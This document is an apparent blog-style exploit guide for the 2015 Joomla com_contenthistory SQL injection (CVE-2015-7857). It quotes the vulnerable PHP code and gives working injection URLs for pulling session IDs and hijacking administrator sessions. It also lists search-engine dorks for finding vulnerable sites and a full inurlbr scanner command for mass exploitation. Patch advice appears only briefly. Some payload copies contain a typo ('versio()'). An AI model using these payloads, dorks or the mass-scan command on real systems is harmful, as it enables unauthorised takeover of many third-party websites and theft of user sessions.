Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation.

Joomla CMS that affects more than 2.8 million sites.
Joomla is probably one of web content management (or CMS) more used to creating websites at the enterprise level but also widely used for developing personal websites.
It is an Open source software under the GNU / GPL license, being updated by a community of programmers organized a non-profit structure (Joomla.org).
According to Trustwave joomla CMS (3.2 to 3.4.4) have serious security flaws enabling SQL Injection-type attacks which allow attackers to "win" platform Administrator privileges

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.
Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Source INFO-> [  More Info ]

It was found that the following code snippet is vulnerable SQLI:
PWD: /administrator/components/com_contenthistory/models/history.php

FUNCTION FULL:

 /**
  * Build an SQL query to load the list data.
  *
  * @return  JDatabaseQuery
  *
  * @since   3.2
  */
 protected function getListQuery()
 {
  // Create a new query object.
  $db = $this->getDbo();
  $query = $db->getQuery(true);

  // Select the required fields from the table.
  $query->select(
   $this->getState(
    'list.select',
    'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
    'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
   )
  )
  ->from($db->quoteName('#__ucm_history') . ' AS h')
  ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
  ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

  // Join over the users for the editor
  ->select('uc.name AS editor')
  ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

  // Add the list ordering clause.
  $orderCol = $this->state->get('list.ordering');
  $orderDirn = $this->state->get('list.direction');
  $query->order($db->quoteName($orderCol) . $orderDirn);

  return $query;
 }

CODE FULL:
http://pastebin.com/9FnPuns5

PoC:
REQUEST GET
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

It is possible to extract session ID (cookies) of users logged into the system and set in your browser.

Video demonstration:


In this article we will work SQLI exploitation.

RETURN REQUEST - Exemple Explotation:
URL:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
PRINT REQUEST:

Base validation:
ENCODER HEX =  :INURLBR: 
RESULT =                0x203a494e55524c42523a20

INJECT: 0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20....

DORK:

1. components/com_contenthistory/
2. inurl:com_contenthistory
3. index.php?option=com_contenthistory
4. "index of" components/com_contenthistory/
5. inurl:"components/com_contenthistory/"
6. inurl:"index.php?option=com_contenthistory"

Search demonstration:

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
 --dork 'YOU_DORK'
 OR
 --dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-q all
  we will use all the search engines available in the script

SET OUTPUT FILE:
 -s com_contenthistory.txt

SET TIPE VALIDATION:
 -t 2
    2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
              It also establishes connection with the exploit through the get method.

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.localhost.br/user?id=313032303330

--exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))'

hex(INURLBR) = 494e55524c4252

Example injection:
http://www.target.localhost.br/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example:  -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'INURLBR'

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL: 
php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique


Execution return:

SOLUTION:Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html

Source INFO-1-> https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0

Source INFO-2-> https://cxsecurity.com/issue/WLB-2015100146

Source INFO-3-> http://pplware.sapo.pt/informacao/alerta-milhoes-de-sites-baseados-no-joomla-estao-vulneraveis/